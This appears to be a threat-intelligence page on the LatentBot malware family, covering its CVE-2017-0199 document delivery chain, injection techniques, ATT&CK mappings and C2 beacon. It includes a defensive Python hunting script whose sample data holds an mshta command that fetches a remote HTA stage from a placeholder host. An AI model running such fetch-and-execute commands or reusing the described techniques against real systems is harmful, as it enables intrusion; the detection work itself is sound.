Mallory
Malware | Exploits 1 CVE

LATENTBOT

LatentBot is a highly obfuscated modular malware family that has been in the wild since at least 2013. FireEye described it as using a modular plugin architecture and noted associations with Pony infostealer campaigns. It has been observed as a final payload delivered through malicious Microsoft Office RTF/Word documents exploiting CVE-2017-0199, where crafted documents used embedded OLE2 link objects to retrieve remote HTA/VBScript/PowerShell content via winword.exe and mshta.exe, terminate winword.exe to hide prompts, download additional stages, and open decoy documents. In one documented chain, the exploit downloaded components including maintenance.vbs, an obfuscated JavaScript stage, and a final executable (wood.exe) that was identified as a newer LatentBot variant. Reported LatentBot techniques include attrib.exe patching, svchost.exe code injection, SetThreadContext-based control transfer, and browser injection using ZwMapViewOfSection/NtMapViewOfSection. FireEye reported that the payload infrastructure changed during observation and that the LatentBot C2 moved to 217.12.203[.]100, though the server was offline at the time of analysis. Separately, Zscaler reported that newer Grandoreiro variants adopted a command-and-control communication pattern identical to LatentBot, specifically using "ACTION+HELLO" beacons and ID-based cookie value responses; similarities between Grandoreiro and LatentBot were first noted in 2020. U.S. government reporting also associated LatentBot with exploitation of CVE-2017-0199 affecting Microsoft Office and multiple Windows versions.
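The delivery chain above gives a defender two concrete hunting points: an Office host (winword.exe) spawning a script interpreter such as mshta.exe, and the distinctive "ACTION+HELLO" C2 beacon that Zscaler later saw reused by Grandoreiro. The following Python is an added example, not code from Mallory, FireEye or Zscaler: it runs both checks over constructed Sysmon-style process events and constructed proxy log lines. The parent set is generalised beyond winword.exe to other Office hosts, and the beacon is assumed to travel in the URL-encoded request body, which the page does not state; both are assumptions.

```python
"""Hunting logic for the LatentBot delivery chain and beacon described above.

Added example with constructed sample data; it is not vendor code and the
field layout of the events/log lines is an assumption for illustration.
"""
import re
from typing import Dict, Iterable, List

# winword.exe is the parent named in the documented chain; the other two hosts
# are an assumed generalisation (Office applications rarely spawn script hosts).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Script hosts matching the HTA / VBScript / PowerShell stages described above.
SCRIPT_CHILDREN = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

# Constructed process-creation events (Sysmon Event ID 1-like fields), not real telemetry.
PROCESS_EVENTS: List[Dict[str, str]] = [
    {"pid": "4012",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" C:\Users\alice\Downloads\invoice.rtf'},
    {"pid": "4100",
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "mshta.exe http://203.0.113.7/template.hta"},  # constructed, TEST-NET address
    {"pid": "4188",
     "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"wscript.exe C:\Scripts\logon.vbs"},  # benign: not spawned by Office
]

# Constructed proxy log lines: "<ts> <client> <method> <url> <status> body=<request body>".
PROXY_LOG: List[str] = [
    "2017-04-12T10:01:03Z 10.0.0.15 GET http://intranet.example.local/index.html 200 body=-",
    "2017-04-12T10:01:09Z 10.0.0.15 POST http://203.0.113.7/ 200 body=ACTION+HELLO",
    "2017-04-12T10:02:44Z 10.0.0.22 POST http://shop.example.com/cart 200 body=item=42&action=hello",
]

# Beacon token from the page. Assumption: it appears literally in the request body.
BEACON_RE = re.compile(r"ACTION\+HELLO", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def suspicious_child_processes(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag process-creation events where an Office host spawns a script interpreter."""
    hits = []
    for ev in events:
        if (basename(ev["parent_image"]) in OFFICE_PARENTS
                and basename(ev["image"]) in SCRIPT_CHILDREN):
            hits.append(ev)
    return hits


def beacon_requests(lines: Iterable[str]) -> List[str]:
    """Flag proxy log lines whose request body carries the ACTION+HELLO beacon.

    The near-miss "action=hello" form-field in the sample data is deliberately
    not matched: the literal '+' is part of the documented token.
    """
    hits = []
    for line in lines:
        if " body=" not in line:
            continue
        body = line.split(" body=", 1)[1]
        if BEACON_RE.search(body):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for ev in suspicious_child_processes(PROCESS_EVENTS):
        print(f"[process] pid {ev['pid']}: {basename(ev['parent_image'])} -> {ev['cmdline']}")
    for line in beacon_requests(PROXY_LOG):
        print(f"[beacon]  {line}")
```

Run stand-alone, the script reports the single winword.exe to mshta.exe spawn and the single beaconing POST; the wscript.exe logon script and the shopping-cart request with "action=hello" are left alone, which is the precision a rule like this needs before it is pushed to a SIEM.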


EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVE
CVE-2017-0199 | Microsoft Office/WordPad Remote Code Execution Vulnerability | Exploited in the wild

CVE-2017-0199 ... Associated Malware: FINSPY, LATENTBOT, Dridex | Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1 | Mitigation: Update affected Microsoft products with the latest security patches

via CISA advisories (cisa.gov)
MITRE ATT&CK

Techniques & procedures

4 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566.001 | Spearphishing Attachment | Evidence: 1

According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets.

Execution

1 technique
T1203 | Exploitation for Client Execution | Evidence: 1

U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600. According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. The three vulnerabilities used most frequently across state-sponsored cyber actors from China, Iran, North Korea, and Russia are CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158.

Command and Control

2 techniques
T1071 | Application Layer Protocol | Evidence: 1

The C2 communication pattern is now identical to that of LatentBot, using "ACTION+HELLO" beacons and ID-based cookie value responses.

T1568.002 | Domain Generation Algorithms | Evidence: 1

One of the new additions in the latest Grandoreiro variant sampled by Zscaler is the use of DGA (domain generation algorithm) for C2 communications, which makes mapping the malware's infrastructure and taking it down challenging.

INDICATORS OF COMPROMISE

IOCs tracked for this family

3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Other
3 tracked

Other indicator types observed in public reporting.

Type | Value | Latest sighting
uri | redacted (full value available in Mallory) | 6 years ago
uri | redacted (full value available in Mallory) | 6 years ago
uri | redacted (full value available in Mallory) | 6 years ago